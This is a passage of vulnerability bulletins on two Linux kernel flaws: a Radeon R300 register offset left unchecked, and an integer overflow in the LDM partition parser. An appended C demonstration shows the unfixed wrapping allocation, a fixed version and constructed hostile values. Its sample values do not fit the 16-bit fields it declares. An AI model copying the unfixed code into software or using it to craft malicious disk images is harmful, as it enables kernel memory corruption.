Identifiers: BID-46557, CVE-2011-1016, DSA-2240-1, openSUSE-SU-2011:0416-1, openSUSE-SU-2011:0861-1, RHSA-2011:0498-01, SUSE-SA:2011:019, SUSE-SA:2011:021, SUSE-SA:2011:026, SUSE-SA:2011:027, SUSE-SU-2011:0512-1, SUSE-SU-2011:0711-1, SUSE-SU-2011:0737-1, SUSE-SU-2011:1150-1, VIGILANCE-VUL-10398.

Description of the vulnerability

The drivers/gpu/drm/radeon/r300.c file implements the support of Radeon R300 video devices.

The RB3D_AARESOLVE_OFFSET register tells the video device where the anti-aliasing resolve buffer is placed in video memory.

However, the r300_packet0_check() function, which validates the command stream submitted by user space before it reaches the device, does not check that this offset lies within the destination buffer, so the device can be made to write outside it.

When the system has a Radeon R300 video device, a local attacker can therefore send an AARESOLVE_OFFSET message, in order to write to the memory.

computer vulnerability announce CVE-2011-1017

Linux kernel: buffer overflow via ldm_frag_add

Synthesis of the vulnerability

An attacker can mount a device with a malicious Windows Logical Disk Manager partition, in order to corrupt the kernel memory, which leads to a denial of service or to code execution.
Impacted products: Debian, Linux, openSUSE, SUSE Linux Enterprise Desktop, SLES.
Severity: 2/4.
Consequences: administrator access/rights, privileged access/rights, user access/rights, denial of service on server.
Provenance: user console.
Number of vulnerabilities in this bulletin: 2.
Creation date: 24/02/2011.
Identifiers: BID-46512, CVE-2011-1012-REJECT, CVE-2011-1017, DSA-2264-1, openSUSE-SU-2011:0860-1, openSUSE-SU-2011:0861-1, PRE-SA-2011-01, SUSE-SA:2011:026, SUSE-SA:2011:027, SUSE-SA:2011:031, SUSE-SA:2011:034, SUSE-SA:2011:040, SUSE-SU-2011:0512-1, SUSE-SU-2011:0711-1, SUSE-SU-2011:0737-1, SUSE-SU-2011:0832-1, SUSE-SU-2011:0899-1, SUSE-SU-2011:0928-1, SUSE-SU-2011:1058-1, SUSE-SU-2011:1150-1, VIGILANCE-VUL-10397, ZDI-11-090.

Description of the vulnerability

The fs/partitions/ldm.c file implements the support of Windows Logical Disk Manager partitions. The partition table is parsed automatically when a device formatted with LDM is attached or mounted, so no privilege beyond plugging in the device is needed.

The ldm_frag_add() function adds the VBLK fragments of an LDM partition to a linked list. Each fragment is stored in a memory area whose size is computed from values read from the disk. However, that size is computed from a multiplication which can overflow, so the VBLK data is copied into a memory area which is too small.

An attacker can therefore mount a device with a malicious Windows Logical Disk Manager partition, in order to corrupt the kernel memory, which leads to a denial of service or to code execution.
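The following is an added example, not the kernel's code, of the allocation-size overflow the bulletin describes: a hypothetical fragment header whose record count and record size come from the on-disk VBLK, the unfixed size computation done in wrapping 32-bit arithmetic, a fixed version that rejects the overflow before allocating, and a check of whether a record copy would stay inside the allocation. The struct layout, field widths and sample values are constructions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical fragment header; the VBLK data for all 'num' records of
 * 'size' bytes follows it in the same allocation. */
struct frag_hdr {
    uint32_t group;
    uint16_t num;    /* record count, read from the on-disk VBLK */
    uint16_t size;   /* bytes per record, read from the on-disk VBLK */
};

/* Unfixed: allocation size computed with wrapping 32-bit arithmetic.
 * Returns the byte count that would be requested, which can be far
 * smaller than header + num*size once the multiplication wraps. */
uint32_t frag_alloc_size_unfixed(uint32_t size, uint32_t num) {
    return (uint32_t)sizeof(struct frag_hdr) + size * num;   /* may wrap */
}

/* Fixed: detect overflow before allocating. Returns 0 if the request is
 * impossible (overflow or a zero dimension), otherwise the exact count. */
uint32_t frag_alloc_size_fixed(uint32_t size, uint32_t num) {
    uint32_t data, total;
    if (size == 0 || num == 0) return 0;
    if (__builtin_mul_overflow(size, num, &data)) return 0;
    if (__builtin_add_overflow((uint32_t)sizeof(struct frag_hdr), data, &total)) return 0;
    return total;
}

/* Would copying record 'rec' of 'size' bytes stay inside an allocation of
 * 'alloc' bytes? 1 = fits, 0 = overruns (the corruption case). Computed in
 * 64 bits so the check itself cannot wrap. */
int frag_copy_fits(uint32_t alloc, uint32_t size, uint32_t rec) {
    uint64_t end = (uint64_t)sizeof(struct frag_hdr) + (uint64_t)rec * size + size;
    return end <= alloc;
}

int main(void) {
    uint32_t size = 0x10000, num = 0x10000;   /* constructed hostile VBLK values */
    uint32_t bad = frag_alloc_size_unfixed(size, num);
    printf("unfixed allocates %u bytes, copy of record 0 fits: %d\n",
           bad, frag_copy_fits(bad, size, 0));
    printf("fixed returns %u (0 = rejected)\n", frag_alloc_size_fixed(size, num));
    return 0;
}
```

Values such as 0x10000 x 0x10000 are only one way to make the product wrap; the general rule is that any size derived from untrusted multiplicands must be computed with an overflow check (or a saturating helper) before it is handed to the allocator, and that every later copy must be bounded by the size actually allocated rather than by the on-disk values.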